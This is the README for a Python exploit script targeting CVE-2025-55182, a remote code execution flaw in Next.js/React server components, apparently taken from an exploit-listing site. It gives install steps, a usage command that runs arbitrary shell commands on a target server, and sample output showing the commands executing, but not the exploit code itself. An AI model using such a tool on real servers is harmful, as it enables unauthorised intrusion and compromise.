Share
## https://sploitus.com/exploit?id=57943B09-0448-5A84-998B-D2A0DDB0E5D0
# CVE-2025-55182 Python Exploit

Python 3 script that can be used to demonstrate **CVE-2025-55182**. It exploits a server-side JavaScript injection vulnerability in Next.js/React applications, allowing **remote code execution** via malformed multipart form data.

> โš ๏ธ For educational and authorized testing purposes only.

---

## ๐Ÿš€ Usage

### ๐Ÿ”ง Prerequisites

```bash
pip install requests
```

### Example Usage
```bash
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"
```
### Options
-u	Target domain or IP with protocol	- http://localhost:3000
-c	Command to execute on the server -	id

### Sample Output
```bash
[+] Sending exploit to http://localhost:3000 with command: id
[+] Command Result:
uid=1000(app) gid=1000(app) groups=1000(app)
```
## Reference
https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/